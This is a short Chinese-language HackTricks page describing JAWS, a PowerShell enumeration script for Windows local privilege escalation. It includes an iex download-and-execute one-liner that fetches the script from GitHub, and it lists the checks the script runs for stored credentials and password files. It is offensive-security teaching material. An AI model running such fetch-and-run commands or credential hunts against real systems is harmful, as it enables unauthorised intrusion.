hacktricks/windows-hardening/windows-local-privilege-escalation/jaws.md

2.9 KiB
Raw Blame History

从零开始学习AWS黑客攻击直至成为专家通过 htARTE (HackTricks AWS Red Team Expert)

支持HackTricks的其他方式

开始

iex(New-Object net.WebClient).downloadstring("https://raw.githubusercontent.com/411Hall/JAWS
/master/jaws-enum.ps1")

信息收集

它不仅检查权限提升配置错误,还收集有关当前情况的信息。

  • 用户和组
  • 网络接口、arp、端口、防火墙大量输出主机
  • 进程
  • 计划任务(大量输出)
  • 服务(大量输出)
  • 已安装软件,程序文件夹
  • 补丁
  • 驱动器
  • 最后修改的文件

检查

  • 具有完全控制权限的文件和文件夹
  • 未加引号的服务路径
  • 潜在有趣的文件
  • 包含密码的系统文件
  • 存储的凭据
从零开始学习AWS黑客攻击直到成为专家通过 htARTE (HackTricks AWS Red Team Expert)

支持HackTricks的其他方式